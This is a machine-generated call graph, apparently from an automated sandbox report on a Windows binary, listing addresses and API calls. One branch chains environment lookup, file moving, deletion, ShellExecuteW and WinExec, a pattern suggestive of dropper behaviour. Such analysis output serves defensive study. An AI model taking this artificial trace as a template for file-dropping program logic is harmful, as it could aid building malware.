11143 5edc8b GetParent 11141->11143 11145 5edc82 11141->11145 11342 5321b0 11141->11342 11144 5edca8 IsWindowUnicode 11142->11144 11142->11145 11143->11141 11146 5edcb2 SendMessageW 11144->11146 11147 5edcd1 SendMessageA 11144->11147 11145->11144 11146->11134 11146->11140 11147->11134 11147->11140 11149 5edbed 11148->11149 11150 5edbb9 IsWindowUnicode 11148->11150 11149->11098 11149->11115 11151 5edbda IsDialogMessageA 11150->11151 11152 5edbc5 IsDialogMessageW 11150->11152 11151->11149 11152->11149 11154 53215f GetWindowThreadProcessId 11153->11154 11161 5321a6 11153->11161 11155 53216a GetCurrentProcessId 11154->11155 11154->11161 11156 532174 11155->11156 11155->11161 11157 53217e GlobalFindAtomW 11156->11157 11158 53219f 11157->11158 11159 53218d GetPropW 11157->11159 11162 532120 GetCurrentProcessId GetWindowThreadProcessId 11158->11162 11159->11161 11161->11121 11163 532137 11162->11163 11164 53214d 11162->11164 11163->11164 11165 53213c SendMessageW 11163->11165 11164->11161 11165->11164 11167 5ef34d 11166->11167 11168 5ef336 11166->11168 11167->11127 11174 5ef2ac 11168->11174 11170 5ef33d 11183 5ebbe8 11170->11183 11175 5ef30c 11174->11175 11176 5ef2ba 11174->11176 11175->11170 11176->11175 11177 5ef2d0 IsWindowVisible 11176->11177 11177->11175 11178 5ef2da 11177->11178 11179 5ef30e 11178->11179 11180 5ef2ec 11178->11180 11195 5ef0b8 11179->11195 11182 5ef2f9 ShowWindow 11180->11182 11182->11175 11184 5ebbff 11183->11184 11185 5ebbf4 UnhookWindowsHookEx 11183->11185 11186 5ebc66 11184->11186 11187 5ebc20 SetEvent GetCurrentThreadId 11184->11187 11185->11184 11192 5ef0f8 11186->11192 11188 5ebc5d CloseHandle 11187->11188 11189 5ebc38 11187->11189 11188->11186 11190 5ebc44 MsgWaitForMultipleObjects 11189->11190 11201 5edfd0 11189->11201 11190->11188 11190->11189 11193 5ef115 11192->11193 11194 5ef105 KillTimer 11192->11194 11193->11167 11194->11193 11196 5ef0f8 KillTimer 11195->11196 11197 5ef0c8 SetTimer 11196->11197 11198 5ef0ed 11197->11198 11199 5ef0f4 11197->11199 11200 5ef320 127 API calls 11198->11200 11199->11175 11200->11199 11202 5edea4 128 API calls 11201->11202 11203 5edfdf 11202->11203 11204 5edfec 11203->11204 11206 5eec78 11203->11206 11204->11190 11226 5eebec GetCursorPos 11206->11226 11209 5ef320 125 API calls 11210 5eecc1 11209->11210 11229 5eeed4 11210->11229 11212 5eece3 11213 5eed31 GetCurrentThreadId 11212->11213 11215 5eed29 11212->11215 11216 5eed33 11212->11216 11217 5eedac 11213->11217 11223 5eedb3 11213->11223 11234 5eeb88 11215->11234 11216->11213 11221 5eed4f SetTimer 11216->11221 11240 4c2448 11217->11240 11220 5eedc1 WaitMessage 11224 5eedc6 11220->11224 11221->11213 11222 5eed76 11221->11222 11225 5eeb88 73 API calls 11222->11225 11223->11220 11223->11224 11224->11204 11225->11213 11271 533cc8 11226->11271 11230 5eeee8 11229->11230 11232 5eeefe 11230->11232 11276 55e8ac 11230->11276 11232->11212 11233 5eef1c 11233->11212 11235 5eeb95 11234->11235 11236 5eebe8 11235->11236 11238 5eebbf IsWindowVisible 11235->11238 11239 5eebd0 IsWindowEnabled 11235->11239 11280 5eaafc 11235->11280 11236->11213 11238->11235 11239->11235 11241 4c245c 11240->11241 11242 4c2465 11240->11242 11241->11223 11283 4c2b14 11242->11283 11245 4c24a3 11247 4c24a7 11245->11247 11248 4c24b0 11245->11248 11246 4c2b14 77 API calls 11249 4c247c 11246->11249 11304 4c2420 WaitForSingleObject 11247->11304 11308 4c2414 ResetEvent 11248->11308 11294 42aa4c 11249->11294 11252 4c24ae 11309 408c24 11252->11309 11254 4c249e 11300 409410 11254->11300 11257 4c24c9 11313 4089ac 11257->11313 11260 4c263e 11260->11223 11264 4c2538 11336 408b8c 11264->11336 11266 4c2542 11267 408c24 5 API calls 11266->11267 11268 4c25f3 11267->11268 11269 4089ac 13 API calls 11268->11269 11270 4c25fb 11269->11270 11270->11223 11272 533c94 9 API calls 11271->11272 11274 533cdc 11272->11274 11273 533d02 11273->11209 11273->11210 11274->11273 11275 53b780 71 API calls 11274->11275 11275->11273 11277 55e8b2 11276->11277 11278 51b8f0 75 API calls 11277->11278 11279 55e8c7 11278->11279 11279->11233 11281 4ae244 71 API calls 11280->11281 11282 5eab0c 11281->11282 11282->11235 11284 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11283->11284 11285 4c2b1a 11284->11285 11286 4c2b6e 11285->11286 11288 4c0c10 77 API calls 11285->11288 11287 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11286->11287 11289 4c246a 11287->11289 11292 4c2b2f 11288->11292 11289->11245 11289->11246 11290 4d3934 71 API calls 11291 4c2b69 11290->11291 11293 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11291->11293 11292->11290 11293->11286 11295 42aa5a 11294->11295 11296 40f080 46 API calls 11295->11296 11297 42aa84 11296->11297 11298 425dac 71 API calls 11297->11298 11299 42aa92 11298->11299 11299->11254 11302 409414 11300->11302 11301 40945c 11301->11301 11302->11301 11303 406f68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11302->11303 11303->11301 11305 4c2438 11304->11305 11306 4c2433 11304->11306 11305->11252 11307 4c2414 ResetEvent 11306->11307 11307->11305 11308->11252 11310 408c2c 11309->11310 11311 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11310->11311 11312 408c42 11310->11312 11311->11312 11312->11257 11321 4089ba 11313->11321 11314 408e38 GetCurrentThreadId GetCurrentThreadId 11314->11321 11315 408a08 11315->11260 11328 4ae244 11315->11328 11316 4089e3 GetTickCount 11316->11321 11317 408a8c GetTickCount 11320 408ba4 Sleep 11317->11320 11318 4089fb GetTickCount 11318->11315 11318->11321 11319 408a55 GetTickCount 11319->11315 11319->11321 11325 408a9c 11320->11325 11321->11314 11321->11315 11321->11316 11321->11317 11321->11318 11321->11319 11322 408a2a GetCurrentThreadId 11321->11322 11323 408668 Sleep Sleep SwitchToThread 11321->11323 11322->11315 11323->11321 11324 408ab6 GetTickCount 11324->11325 11325->11317 11325->11324 11326 408b20 11325->11326 11326->11315 11327 408b26 GetCurrentThreadId 11326->11327 11327->11315 11329 4ae260 11328->11329 11330 4ae251 11328->11330 11332 4ae0b8 11329->11332 11331 4ae158 71 API calls 11330->11331 11331->11329 11333 4ae0c3 11332->11333 11334 4ae158 71 API calls 11333->11334 11335 4ae0d7 11333->11335 11334->11335 11335->11264 11337 408b94 11336->11337 11338 408c24 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11337->11338 11339 408b9b 11338->11339 11340 408b44 GetCurrentThreadId Sleep 11339->11340 11341 408ba0 11340->11341 11341->11266 11343 532154 7 API calls 11342->11343 11344 5321ba 11343->11344 11344->11141 11346 40a8aa 11345->11346 11346->11059 11348 635b6c 11347->11348 11349 635bfd 11348->11349 11355 4246d0 11348->11355 11359 40eefc 11349->11359 11352 635c66 11375 409ddc 11352->11375 11354 635c86 11354->11074 11356 4246e0 11355->11356 11357 424701 11356->11357 11378 423398 11356->11378 11357->11348 11360 409ddc SysFreeString 11359->11360 11361 40ef24 11360->11361 11362 40ef7f 11361->11362 11383 40a800 11361->11383 11364 409ddc SysFreeString 11362->11364 11365 40ef94 11364->11365 11365->11352 11366 40ef3f 11389 40ed58 11366->11389 11369 40ef6c 11372 409ddc SysFreeString 11369->11372 11370 40ef5f 11371 40a800 4 API calls 11370->11371 11373 40ef6a 11371->11373 11372->11373 11396 40a1e8 11373->11396 11376 409df0 11375->11376 11377 409de2 SysFreeString 11375->11377 11376->11354 11377->11376 11379 42aa4c 71 API calls 11378->11379 11380 4233b1 11379->11380 11381 409410 4 API calls 11380->11381 11382 4233b6 11381->11382 11382->11357 11384 40a80d 11383->11384 11388 40a814 11383->11388 11403 409d7c 11384->11403 11412 40a650 11388->11412 11390 40ed6d 11389->11390 11395 40ed8a 11389->11395 11391 40edc8 11390->11391 11393 40ed75 11390->11393 11416 40f114 MultiByteToWideChar 11391->11416 11415 40f114 MultiByteToWideChar 11393->11415 11395->11369 11395->11370 11397 40a20f 11396->11397 11402 409d74 11396->11402 11397->11362 11398 409ddc 11399 409df0 11398->11399 11400 409de2 SysFreeString 11398->11400 11399->11362 11400->11399 11401 40a1ff SysReAllocStringLen 11401->11397 11401->11402 11402->11396 11402->11398 11402->11401 11404 409d90 11403->11404 11405 409d80 SysAllocStringLen 11403->11405 11404->11388 11405->11404 11406 409d74 11405->11406 11407 40a20f 11406->11407 11408 409ddc 11406->11408 11411 40a1ff SysReAllocStringLen 11406->11411 11407->11388 11409 409df0 11408->11409 11410 409de2 SysFreeString 11408->11410 11409->11388 11410->11409 11411->11406 11411->11407 11413 40a656 SysFreeString 11412->11413 11414 40a65c 11412->11414 11413->11414 11414->11366 11415->11395 11416->11395 11418 639749 11417->11418 11439 63b124 11418->11439 11420 63982f 11445 60b774 11420->11445 11426 63986d 11500 42547c 11426->11500 11428 63989c 11429 42547c 5 API calls 11428->11429 11430 6398c6 11429->11430 11509 42d8fc 11430->11509 11432 6398d3 11433 639901 MoveFileW Sleep 11432->11433 11434 639926 11433->11434 11515 633bd8 11434->11515 11436 639942 11519 63586c Sleep WinExec Sleep 11436->11519 11438 639951 Sleep 11438->11082 11440 63b138 11439->11440 11520 4b5a8c 11440->11520 11442 63b185 11525 4b59a0 11442->11525 11444 63b1ce 11444->11420 11446 60b8e4 73 API calls 11445->11446 11447 60b78b 11446->11447 11448 60b79b 11447->11448 11452 42a97c 46 API calls 11447->11452 11449 4b5668 79 API calls 11448->11449 11450 60b7d4 11449->11450 11605 60b824 11450->11605 11454 60b7bf 11452->11454 11455 409410 4 API calls 11454->11455 11455->11448 11456 60c5bc 11457 60c5e4 11456->11457 11458 60c5cd 11456->11458 11459 60c603 11457->11459 11802 60bdbc 11457->11802 11460 42a97c 46 API calls 11458->11460 11464 60b8e4 11459->11464 11461 60c5df 11460->11461 11463 409410 4 API calls 11461->11463 11463->11457 11467 60b901 11464->11467 11465 60bd01 11466 43eb70 71 API calls 11465->11466 11468 60bd23 11466->11468 11467->11465 11469 60b96c 11467->11469 11475 60bb82 11467->11475 11468->11426 11470 40b08c 16 API calls 11469->11470 11471 60b999 11470->11471 11472 43d0d8 50 API calls 11471->11472 11473 60b9a4 11472->11473 11476 40b34c 25 API calls 11473->11476 11474 60bc02 12062 609788 11474->12062 11475->11474 11477 40c0c0 25 API calls 11475->11477 11478 60b9c1 11476->11478 11477->11474 11479 40b34c 25 API calls 11478->11479 11481 60b9d2 11479->11481 11483 40b08c 16 API calls 11481->11483 11485 60b9ed 11483->11485 11485->11426 11487 609748 46 API calls 11488 60bc70 11487->11488 11489 609748 46 API calls 11488->11489 11490 60bc87 11489->11490 11491 609748 46 API calls 11490->11491 11492 60bc9e 11491->11492 11493 609788 46 API calls 11492->11493 11494 60bcb4 11493->11494 11495 609788 46 API calls 11494->11495 11496 60bcca 11495->11496 11497 609748 46 API calls 11496->11497 11498 60bce1 11497->11498 11498->11465 12070 6096d0 11498->12070 11501 40a8a4 11500->11501 11502 425489 DeleteFileW 11501->11502 11503 4254d1 11502->11503 11504 42549b GetLastError GetFileAttributesW 11502->11504 11503->11428 11505 4254cb SetLastError 11504->11505 11506 4254ad 11504->11506 11505->11503 11506->11505 11507 4254b6 11506->11507 11508 4254bd RemoveDirectoryW 11507->11508 11508->11503 11510 42d911 11509->11510 11511 42d922 GetEnvironmentVariableW 11510->11511 11512 42d934 11511->11512 11513 42d941 11511->11513 11512->11432 11514 42d953 GetEnvironmentVariableW 11513->11514 11514->11512 11516 633bef 11515->11516 11517 633c23 ShellExecuteW 11516->11517 11518 633c4f 11517->11518 11518->11436 11519->11438 11528 4b5668 11520->11528 11522 4b5aa3 11532 4b5a3c 11522->11532 11524 4b5abe 11524->11442 11526 4b5668 79 API calls 11525->11526 11527 4b59ba 11526->11527 11527->11444 11529 4b5671 11528->11529 11536 4b56ac 11529->11536 11531 4b568d 11531->11522 11533 4b5a50 11532->11533 11534 4b5a86 11533->11534 11578 4b3e00 11533->11578 11534->11524 11537 4b56c7 11536->11537 11538 4b5772 11537->11538 11539 4b56f4 11537->11539 11574 424aa8 11538->11574 11559 424b00 11539->11559 11542 4b577c 11543 4257c8 2 API calls 11542->11543 11549 4b5770 11542->11549 11545 4b5797 GetLastError 11543->11545 11544 4b5711 11544->11549 11563 4257c8 11544->11563 11547 429308 2 API calls 11545->11547 11550 4b57b0 11547->11550 11548 4b5730 GetLastError 11569 429308 11548->11569 11549->11531 11552 42aa4c 71 API calls 11550->11552 11554 4b57d2 11552->11554 11553 4b5749 11555 42aa4c 71 API calls 11553->11555 11556 409410 4 API calls 11554->11556 11557 4b576b 11555->11557 11556->11549 11558 409410 4 API calls 11557->11558 11558->11549 11560 424b16 11559->11560 11561 424b4e 11559->11561 11562 424b48 CreateFileW 11560->11562 11561->11544 11562->11561 11564 40a8a4 11563->11564 11565 4257e8 GetFullPathNameW 11564->11565 11566 4257fa 11565->11566 11567 425809 11565->11567 11566->11548 11567->11566 11568 42581e GetFullPathNameW 11567->11568 11568->11566 11570 429319 11569->11570 11571 42931f FormatMessageW 11569->11571 11570->11571 11572 429341 11571->11572 11573 429367 LocalFree 11572->11573 11573->11553 11575 424afc 11574->11575 11576 424abe 11574->11576 11575->11542 11576->11575 11577 424af6 CreateFileW 11576->11577 11577->11575 11579 4b3e1d 11578->11579 11584 4b3e3a 11579->11584 11587 42a97c 11579->11587 11581 4b3e75 11581->11534 11582 4b3e35 11583 409410 4 API calls 11582->11583 11583->11584 11584->11581 11585 42a97c 46 API calls 11584->11585 11586 409410 4 API calls 11584->11586 11585->11584 11586->11584 11588 42a983 11587->11588 11591 40f080 11588->11591 11590 42a99b 11590->11582 11592 40f088 11591->11592 11593 40f0d5 11592->11593 11596 40c4e0 11592->11596 11593->11590 11595 40f0c4 LoadStringW 11595->11593 11597 40c50d 11596->11597 11598 40c4ee 11596->11598 11597->11595 11598->11597 11601 40c498 11598->11601 11602 40c4c4 11601->11602 11603 40c4a8 GetModuleFileNameW 11601->11603 11602->11595 11604 40d70c 44 API calls 11603->11604 11604->11602 11606 60b8e4 73 API calls 11605->11606 11607 60b83a 11606->11607 11608 42a97c 46 API calls 11607->11608 11614 60b855 11607->11614 11609 60b850 11608->11609 11610 409410 4 API calls 11609->11610 11610->11614 11611 60b881 11612 60b7f1 11611->11612 11618 60a5c0 11611->11618 11612->11456 11614->11611 11615 42a97c 46 API calls 11614->11615 11616 60b87c 11615->11616 11617 409410 4 API calls 11616->11617 11617->11611 11619 60a5d9 11618->11619 11638 43eb70 11619->11638 11622 60a82b 11656 40b08c 11622->11656 11625 60a611 11627 42a97c 46 API calls 11625->11627 11633 60a62c 11625->11633 11628 60a627 11627->11628 11629 409410 4 API calls 11628->11629 11629->11633 11630 42a97c 46 API calls 11630->11633 11631 609658 46 API calls 11631->11633 11632 409410 4 API calls 11632->11633 11633->11622 11633->11630 11633->11631 11633->11632 11634 609694 46 API calls 11633->11634 11635 40c0c0 25 API calls 11633->11635 11636 6095e0 46 API calls 11633->11636 11651 43eab8 11633->11651 11634->11633 11635->11633 11636->11633 11662 4410f0 11638->11662 11643 60b0ac 11644 60b0d9 11643->11644 11738 40c0c0 11644->11738 11646 60b312 11646->11625 11647 60b11b 11647->11646 11649 60b29c 11647->11649 11741 6095e0 11647->11741 11649->11646 11650 40c0c0 25 API calls 11649->11650 11650->11646 11745 43fcbc 11651->11745 11653 43eacf 11654 40b8f8 25 API calls 11653->11654 11655 43eafa 11654->11655 11655->11633 11657 40b0a2 11656->11657 11658 40b0bf 11656->11658 11657->11658 11659 40b0c1 11657->11659 11762 40b104 11657->11762 11658->11612 11659->11658 11775 40eb60 11659->11775 11663 441112 11662->11663 11664 4410fb 11662->11664 11668 440f44 25 API calls 11663->11668 11670 441131 11663->11670 11665 42a97c 46 API calls 11664->11665 11666 44110d 11665->11666 11667 409410 4 API calls 11666->11667 11667->11663 11668->11670 11669 43eb7c 11672 440f44 11669->11672 11670->11669 11675 43f238 11670->11675 11681 40be18 11672->11681 11674 43eb85 11674->11622 11674->11643 11676 43f250 11675->11676 11677 42a97c 46 API calls 11676->11677 11680 43f282 11676->11680 11678 43f27d 11677->11678 11679 409410 4 API calls 11678->11679 11679->11680 11680->11669 11682 40be56 11681->11682 11686 40be3b 11681->11686 11683 40bec4 11682->11683 11685 40bf91 11682->11685 11691 40bf2b 11683->11691 11692 40bdd4 11683->11692 11685->11691 11709 40b8f8 11685->11709 11686->11674 11688 40be18 25 API calls 11688->11691 11689 40bedc 11689->11691 11702 40b7d0 11689->11702 11691->11686 11691->11688 11713 41028c 11692->11713 11694 40bddd 11695 40bde5 11694->11695 11698 40bdf3 11694->11698 11696 41028c 4 API calls 11695->11696 11697 40bdea 11696->11697 11697->11689 11699 41028c 4 API calls 11698->11699 11700 40be01 11699->11700 11701 41028c 4 API calls 11700->11701 11701->11697 11703 40b7ec 11702->11703 11704 40b830 11702->11704 11703->11704 11707 40b86a 11703->11707 11708 40b899 11703->11708 11704->11691 11705 40b7d0 25 API calls 11705->11707 11707->11704 11707->11705 11708->11704 11721 40b4f4 11708->11721 11710 40b901 11709->11710 11711 40b909 11709->11711 11728 40b6b8 11710->11728 11711->11691 11714 4102c1 TlsGetValue 11713->11714 11715 41029b 11713->11715 11716 4102a6 11714->11716 11717 4102cb 11714->11717 11715->11694 11718 4101c0 LocalAlloc TlsSetValue 11716->11718 11717->11694 11719 4102ab TlsGetValue 11718->11719 11720 4102ba 11719->11720 11720->11694 11722 40b693 11721->11722 11726 40b517 11721->11726 11722->11708 11723 40b7d0 25 API calls 11723->11726 11724 40b4f4 25 API calls 11724->11726 11725 40eb8c 25 API calls 11725->11726 11726->11722 11726->11723 11726->11724 11726->11725 11727 40eb60 14 API calls 11726->11727 11727->11726 11729 40b6cd 11728->11729 11732 40b6ea 11728->11732 11730 40b6d2 11729->11730 11731 40b71e 11729->11731 11730->11732 11734 40b75d 11730->11734 11737 40b6e1 11730->11737 11731->11732 11733 40a1e8 SysFreeString SysReAllocStringLen 11731->11733 11732->11711 11733->11731 11734->11732 11735 40b6b8 25 API calls 11734->11735 11735->11734 11736 40b34c 25 API calls 11736->11737 11737->11732 11737->11736 11739 40be18 25 API calls 11738->11739 11740 40c0ca 11739->11740 11740->11647 11742 6095f5 11741->11742 11743 609628 11742->11743 11744 42a97c 46 API calls 11742->11744 11743->11647 11744->11743 11746 43fccc 11745->11746 11747 43fcd5 11746->11747 11748 43fcdf 11746->11748 11753 43fc7c 11747->11753 11750 43fce8 11748->11750 11759 42a83c 11748->11759 11750->11653 11755 43fc90 11753->11755 11754 43fc9b 11757 440f44 25 API calls 11754->11757 11755->11754 11756 42a83c 4 API calls 11755->11756 11756->11755 11758 43fcb8 11757->11758 11758->11653 11760 409410 4 API calls 11759->11760 11761 42a846 11760->11761 11761->11750 11763 40b10d 11762->11763 11768 40b13a 11762->11768 11764 40b12a 11763->11764 11765 40b16c 11763->11765 11763->11768 11764->11768 11772 40b132 11764->11772 11773 40b1af 11764->11773 11766 40b173 11765->11766 11767 40b17d 11765->11767 11769 409ddc SysFreeString 11766->11769 11779 409e54 11767->11779 11768->11657 11769->11768 11771 40b104 16 API calls 11771->11773 11772->11768 11774 40b08c 16 API calls 11772->11774 11773->11768 11773->11771 11774->11772 11776 40eb85 11775->11776 11777 40eb6b 11775->11777 11776->11659 11783 40eb2c 11777->11783 11781 409e5a 11779->11781 11780 409e60 SysFreeString 11780->11781 11781->11780 11782 409e72 11781->11782 11782->11768 11784 40eb30 11783->11784 11785 40eb3d 11783->11785 11787 40e80c 11784->11787 11785->11776 11788 40e8b8 11787->11788 11789 40e82c 11787->11789 11788->11785 11794 40e474 11789->11794 11791 40e854 11798 40e4dc 11791->11798 11795 40e487 11794->11795 11796 40e47d 11794->11796 11795->11791 11797 4089ac 13 API calls 11796->11797 11797->11795 11799 40e4e5 11798->11799 11800 40e4ec 11798->11800 11801 408b44 GetCurrentThreadId Sleep 11799->11801 11800->11785 11801->11800 11803 60be07 11802->11803 11804 40b08c 16 API calls 11803->11804 11805 60be86 11804->11805 11832 60ca14 11805->11832 11809 60beb5 11857 60b5cc 11809->11857 11811 60bedd 11812 60bee5 11811->11812 11813 60bf6c 11811->11813 11814 40b08c 16 API calls 11812->11814 11878 42c1dc 11813->11878 11816 60bf0a 11814->11816 11863 43d0d8 11816->11863 11817 60bf8d 11821 60bfa1 11817->11821 11822 60bfeb 11817->11822 11820 40b34c 25 API calls 11824 60bf38 11820->11824 11891 4fb5e8 11821->11891 11827 4fb5e8 50 API calls 11822->11827 11869 609f84 11824->11869 11826 60bf49 11828 40b08c 16 API calls 11826->11828 11831 60c02a 11827->11831 11830 60bf64 11828->11830 11829 60bfc3 11829->11457 11830->11457 11831->11457 11833 60ca40 11832->11833 11834 60ca8d 11833->11834 11835 42a97c 46 API calls 11833->11835 11836 42a97c 46 API calls 11834->11836 11839 60cab8 11834->11839 11837 60ca88 11835->11837 11838 60cab3 11836->11838 11840 409410 4 API calls 11837->11840 11841 409410 4 API calls 11838->11841 11842 40b08c 16 API calls 11839->11842 11840->11834 11841->11839 11843 60cb1e 11842->11843 11844 43d0d8 50 API calls 11843->11844 11845 60cb29 11844->11845 11846 40b34c 25 API calls 11845->11846 11847 60cb46 11846->11847 11848 40b08c 16 API calls 11847->11848 11849 60be9e 11848->11849 11850 40b34c 11849->11850 11851 40b4db 11850->11851 11854 40b371 11850->11854 11851->11809 11853 40a1e8 2 API calls 11853->11854 11854->11851 11854->11853 11855 40b6b8 25 API calls 11854->11855 11856 40b34c 25 API calls 11854->11856 11903 40eb8c 11854->11903 11855->11854 11856->11854 11858 60b5e6 11857->11858 11862 60b67e 11858->11862 11963 431b00 11858->11963 11860 60b673 11967 431938 11860->11967 11862->11811 11864 43d0e0 11863->11864 11865 43d0fe 11864->11865 11866 42a97c 46 API calls 11864->11866 11865->11820 11867 43d0f9 11866->11867 11868 409410 4 API calls 11867->11868 11868->11865 11870 609fa0 11869->11870 11871 609fc3 11870->11871 11872 609fb4 11870->11872 11874 431828 52 API calls 11871->11874 12023 431828 11872->12023 11875 609fbe 11874->11875 11876 431938 71 API calls 11875->11876 11877 60a00a 11876->11877 11877->11826 11879 42c215 11878->11879 11884 42c2a0 11879->11884 11890 42c235 11879->11890 12029 423884 11879->12029 11883 42c26d 11883->11884 11885 423884 CharUpperBuffW 11883->11885 11886 42c38a 11884->11886 11889 42c2f8 11884->11889 11885->11884 11888 40c0c0 25 API calls 11886->11888 11886->11890 11888->11886 11889->11890 12037 42f984 11889->12037 11890->11817 11892 4fb612 11891->11892 11894 4fb620 11891->11894 11892->11829 11893 4fb680 12053 4fc074 11893->12053 11894->11892 11894->11893 11896 42a97c 46 API calls 11894->11896 11899 4fb65c 11894->11899 11897 4fb657 11896->11897 11898 409410 4 API calls 11897->11898 11898->11899 11899->11893 11900 42a97c 46 API calls 11899->11900 11901 4fb67b 11900->11901 11902 409410 4 API calls 11901->11902 11902->11893 11904 40eb9e 11903->11904 11905 40eb60 14 API calls 11904->11905 11906 40ebb3 11905->11906 11909 40eaf4 11906->11909 11908 40ebca 11908->11854 11910 40eb27 11909->11910 11911 40eaff 11909->11911 11910->11908 11913 40e734 11911->11913 11914 40e750 11913->11914 11915 40e758 11913->11915 11925 40e5d0 11914->11925 11917 40e474 13 API calls 11915->11917 11918 40e780 11917->11918 11920 40e7c3 11918->11920 11936 40e53c 11918->11936 11921 40e4dc 2 API calls 11920->11921 11923 40e7e4 11921->11923 11923->11910 11926 40e685 11925->11926 11927 40e5e9 11925->11927 11926->11915 11928 40e5fa 11927->11928 11947 408850 11927->11947 11929 4089ac 13 API calls 11928->11929 11934 40e629 11929->11934 11931 40e658 11954 408b44 11931->11954 11934->11931 11951 40e460 11934->11951 11937 40e544 11936->11937 11938 40e54d 11937->11938 11959 40e00c 11937->11959 11940 40e2f0 11938->11940 11941 40e30a 11940->11941 11942 40e313 11941->11942 11944 40e32d 11941->11944 11943 40c0c0 25 API calls 11942->11943 11946 40e328 11943->11946 11945 40c0c0 25 API calls 11944->11945 11944->11946 11945->11946 11946->11920 11948 40885e 11947->11948 11949 408859 11947->11949 11948->11928 11950 408724 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11949->11950 11950->11948 11952 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11951->11952 11953 40e468 11952->11953 11953->11934 11955 408838 GetCurrentThreadId 11954->11955 11956 408b4f 11955->11956 11957 408ba4 Sleep 11956->11957 11958 408b7b 11956->11958 11957->11958 11958->11915 11960 40e017 11959->11960 11961 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 11960->11961 11962 40e01e 11961->11962 11962->11938 11964 431b09 11963->11964 11966 431b15 11963->11966 11991 431f14 11964->11991 11966->11860 11969 431955 11967->11969 11968 431979 11970 4319a1 11968->11970 11972 42aa4c 71 API calls 11968->11972 11969->11968 11971 42a97c 46 API calls 11969->11971 11973 4319c9 11970->11973 11974 42aa4c 71 API calls 11970->11974 11975 431974 11971->11975 11976 43199c 11972->11976 11978 4319fe 11973->11978 11982 42aa4c 71 API calls 11973->11982 11977 4319c4 11974->11977 11979 409410 4 API calls 11975->11979 11980 409410 4 API calls 11976->11980 11981 409410 4 API calls 11977->11981 12005 4311e8 11978->12005 11979->11968 11980->11970 11981->11973 11984 4319f9 11982->11984 11986 409410 4 API calls 11984->11986 11986->11978 11987 42a97c 46 API calls 11988 431a28 11987->11988 11990 409410 4 API calls 11988->11990 11989 431a2d 11989->11862 11990->11989 11992 431f1a 11991->11992 11995 431bfc 11992->11995 11994 431f38 11994->11966 11996 431c08 11995->11996 11997 431c22 11996->11997 11998 431c18 GetACP 11996->11998 11999 431c25 GetCPInfo 11997->11999 11998->11999 12000 431c42 11999->12000 12001 431c59 11999->12001 12002 42a97c 46 API calls 12000->12002 12001->11994 12003 431c54 12002->12003 12004 409410 4 API calls 12003->12004 12004->12001 12006 431214 12005->12006 12007 4311f9 12005->12007 12008 431241 12006->12008 12010 42aa4c 71 API calls 12006->12010 12007->12006 12009 42a97c 46 API calls 12007->12009 12013 42aa4c 71 API calls 12008->12013 12014 431269 12008->12014 12011 43120f 12009->12011 12012 43123c 12010->12012 12016 409410 4 API calls 12011->12016 12017 409410 4 API calls 12012->12017 12018 431264 12013->12018 12015 43129f 12014->12015 12019 42aa4c 71 API calls 12014->12019 12015->11987 12015->11989 12016->12006 12017->12008 12020 409410 4 API calls 12018->12020 12021 43129a 12019->12021 12020->12014 12022 409410 4 API calls 12021->12022 12022->12015 12024 431842 12023->12024 12025 431832 12023->12025 12024->11875 12026 431f14 52 API calls 12025->12026 12028 431840 12025->12028 12027 431875 12026->12027 12027->11875 12028->11875 12031 423893 12029->12031 12030 4238b4 12033 4238b8 12030->12033 12031->12030 12032 4238ae CharUpperBuffW 12031->12032 12032->12030 12034 4238c5 12033->12034 12035 4238f0 12034->12035 12036 4238ea CharLowerBuffW 12034->12036 12035->11883 12036->12035 12040 42fb00 12037->12040 12043 42f9a8 12040->12043 12044 42f9d3 12043->12044 12045 42f9ba 12043->12045 12046 42fa5c CompareStringW 12044->12046 12049 42fa5c 12045->12049 12048 42f9a1 12046->12048 12048->11889 12050 42fa75 12049->12050 12051 42facf CompareStringW 12050->12051 12052 42fa97 12050->12052 12051->12052 12052->12048 12056 4fbb44 12053->12056 12055 4fc07b 12055->11892 12057 4fbb58 12056->12057 12061 4fbb82 12056->12061 12058 42a97c 46 API calls 12057->12058 12057->12061 12059 4fbb7d 12058->12059 12060 409410 4 API calls 12059->12060 12060->12061 12061->12055 12063 6097a1 12062->12063 12064 6097ba 12063->12064 12065 42a97c 46 API calls 12063->12065 12066 609748 12064->12066 12065->12064 12067 609762 12066->12067 12068 60977b 12067->12068 12069 42a97c 46 API calls 12067->12069 12068->11487 12069->12068 12071 6096e5 12070->12071 12072 609719 12071->12072 12073 42a97c 46 API calls 12071->12073 12072->11465 12073->12072 12074 405968 12075 405980 12074->12075 12076 405bc8 12074->12076 12085 405992 12075->12085 12090 405a1d Sleep 12075->12090 12077 405ce0 12076->12077 12078 405b8c 12076->12078 12079 405714 VirtualAlloc 12077->12079 12080 405ce9 12077->12080 12086 405ba6 Sleep 12078->12086 12088 405be6 12078->12088 12082 40574f 12079->12082 12083 40573f 12079->12083 12081 4059a1 12098 4056c8 12083->12098 12084 405a80 12097 405a8c 12084->12097 12103 40564c 12084->12103 12085->12081 12085->12084 12091 405a61 Sleep 12085->12091 12086->12088 12089 405bbc Sleep 12086->12089 12092 40564c VirtualAlloc 12088->12092 12096 405c04 12088->12096 12089->12078 12090->12085 12093 405a33 Sleep 12090->12093 12091->12084 12095 405a77 Sleep 12091->12095 12092->12096 12093->12075 12095->12085 12099 405710 12098->12099 12100 4056d1 12098->12100 12099->12082 12100->12099 12101 4056dc Sleep 12100->12101 12101->12099 12102 4056f6 Sleep 12101->12102 12102->12100 12107 4055e0 12103->12107 12105 405655 VirtualAlloc 12106 40566c 12105->12106 12106->12097 12108 405580 12107->12108 12108->12105 12109 40c498 12110 40c4c4 12109->12110 12111 40c4a8 GetModuleFileNameW 12109->12111 12113 40d70c GetModuleFileNameW 12111->12113 12114 40d75a 12113->12114 12119 40d5e8 12114->12119 12116 40d786 12117 40d798 LoadLibraryExW 12116->12117 12118 40d7a0 12116->12118 12117->12118 12118->12110 12121 